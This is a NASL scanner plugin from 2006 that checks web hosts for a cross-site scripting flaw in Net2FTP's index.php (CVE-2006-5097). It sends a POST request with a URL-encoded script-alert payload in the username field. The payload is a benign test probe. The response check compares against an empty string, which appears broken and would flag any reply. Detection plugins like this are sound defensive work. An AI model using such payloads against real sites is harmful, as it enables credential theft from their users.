############################################################################## # # Net2FTP index.php Cross-Site Scripting Vulnerability # # Copyright: OS2A and it's member companies # # Date Written: 2006/10/05 # # $Revision: 1.1 $ # # $Log: os2a_net2ftp_xss_601783.nasl,v $ # Revision 1.1 2006/10/06 12:54:10 ksjayesh # To production # # # Revision 1.1 2006/10/06 05:47:47 shraddha # Issue #3088 # # ------------------------------------------------------------------------ # This program was written by OS2A and/or it's member companies and is # licensed under the GNU GPL license. Please see below for details. This # header contains information regarding licensing terms under the GPL, and # information regarding obtaining source code from the Author. Consequently, # pursuant to section 3(c) of the GPL, you must accompany the information # found in this header with any distribution you make of this Program. # ------------------------------------------------------------------------ ############################################################################## if(description) { script_id(601783); script_bugtraq_id(20313); script_cve_id("CVE-2006-5097"); script_copyright(english:"Copyright (C) 2006 OS2A"); script_version("$Revision: 1.1 $"); script_category(ACT_GATHER_INFO); script_family(english:"CGI abuses : XSS"); script_name(english:"Net2FTP index.php Cross-Site Scripting Vulnerability"); script_summary(english:"Check for XSS vulnerability in Net2FTP"); desc["english"] = " Overview : This host has Net2FTP installed, which is prone to cross-site scripting attack. This flaw occurs due to improper sanitization of the input passed to the username parameter in index.php. Impact : An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in context of the affected site which may facilitate the theft of cookie-based authentication credentials. Scope of impact is limited to application level. Affected Software : Net2FTP versions 0.93 and prior. Affected Platform : Any system running the affected software. Solution : No vendor supplied patch/upgrade is available as of 06 October 2006. Information regarding this issue will be updated once the solution details are available. For updates, http://www.net2ftp.com/homepage/download.html References : http://www.frsirt.com/english/advisories/2006/3890 CVSS Score : CVSS Base Score : 5.2 (AV:R/AC:L/Au:NR/C:P/I:P/A:N/B:I) CVSS Temporal Score : 4.7 Risk factor : Medium"; script_description(english:desc["english"]); script_dependencies("http_version.nasl"); script_require_ports("Services/www", 80); exit(0); } include("http_func.inc"); include("http_keepalive.inc"); port = get_http_port(default:80); if(!port){ exit(0); } foreach dir (make_list("/net2ftp", cgi_dirs())) { sndReq = http_get(item:string(dir, "/index.php"), port:port); rcvRes = http_keepalive_send_recv(port:port, data:sndReq); if(rcvRes == NULL){ exit(0); } if(egrep(pattern:"Powered by net2ftp", string:rcvRes)) { # Construct HTTP POST request if("input_ftpserver" >< rcvRes){ postdata = raw_string("input_ftpserver=", get_host_name(), "&input_ftpserverport=21" + "&input_username=%3Cscript" + "%3Ealert%28%22OS2A%22%29%3C" + "%2Fscript%3E&input_password=&" + "input_skin=1&state=browse&" + "state2=main&cookiesetonlogin" + "=yes"); } else{ postdata = raw_string("ftpserver=", get_host_name(), "&ftpserverport=21&username=" + "%3Cscript%3Ealert%28%22OS2A" + "%22%29%3C%2Fscript%3E&password" + "=&directory=&language=en&skin=" + "india&ftpmode=binary&Login=" + "Login&state=browse&state2=main"); } sndReq = string("POST ", dir, "/index.php HTTP/1.1\r\n", "Host: ", get_host_name(), "\r\n", "Content-Type: application/x-www-form-urlencoded\r\n", "Content-Length:", strlen(postdata), "\r\n", "\r\n", postdata); rcvRes = http_keepalive_send_recv(port:port, data:sndReq, bodyonly:1); if(rcvRes != NULL) { if('' >< rcvRes){ security_warning(port); } exit(0); } } }